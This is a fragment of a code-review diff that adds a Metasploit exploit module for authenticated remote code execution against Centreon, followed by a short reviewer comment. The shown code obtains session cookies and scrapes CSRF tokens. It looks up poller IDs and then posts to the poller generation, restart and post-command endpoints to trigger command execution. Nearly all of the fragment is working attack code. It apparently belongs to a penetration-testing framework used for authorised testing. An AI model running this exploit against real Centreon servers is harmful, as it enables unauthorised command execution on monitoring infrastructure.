modules/exploits/linux/http/centreon_pollers_auth_rce.rb

```diff
@@ -0,0 +1,337 @@
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_poller_id(poller_name)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+      'cookie' => @cookies,
+      'vars_get' => {'p' => '60901'}
+    )
+    return nil unless response
+
+    href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
+    return nil unless href
+
+    id = href.split('?')[1].split('&')[2].split('=')[1]
+    return id unless id.empty?
+
+    return nil
+  end
+
+  def get_session
+    response = send_request_cgi(
+      'method' => 'HEAD',
+      'uri' => normalize_uri(target_uri.path, 'index.php')
+    )
+    cookies = response.get_cookies
+    return cookies unless cookies.empty?
+  end
+
+  def get_token(uri, params = {})
+    ## Get centreon_token value.
+    request = {
+      'method' => 'GET',
+      'uri' => uri,
+      'cookie' => @cookies
+    }
+    request = request.merge({'vars_get' => params}) unless params.empty?
+    response = send_request_cgi(request)
+
+    return nil unless response
+
+    begin
+      token = response.get_html_document.at('input[@name="centreon_token"]')['value']
+    rescue NoMethodError
+      return nil
+    end
+
+    return token
+  end
+
+  def restart_exportation(poller_id)
+    print_status("Reload the poller to trigger exploitation.")
+    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})
+
+    unless token
+      print_bad('Could not get the poller form token, maybe have not sufficient access right!')
+      return false
+    end
+
+    vprint_status(' -- Generating files.')
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
+      'cookie' => @cookies,
+      'vars_post' => {
+        'poller' => poller_id,
+        'debug' => 'true',
+        'generate' => 'true'
+      }
+    )
+    return false unless response
+
+    vprint_status(' -- Restarting engine.')
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
+      'cookie' => @cookies,
+      'vars_post' => {
+        'poller' => poller_id,
+        'mode' => '2'
+      }
+    )
+    return false unless response
+
+    vprint_status(' -- Executing command.')
+    response = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
+      'cookie' => @cookies,
+      'vars_post' => {'poller' => poller_id}
+    )
+    return false unless response
+
+    return true
+  end
+
+  def check
```

Comment:
I think we can go ahead and remove this if the updated version still has the issue.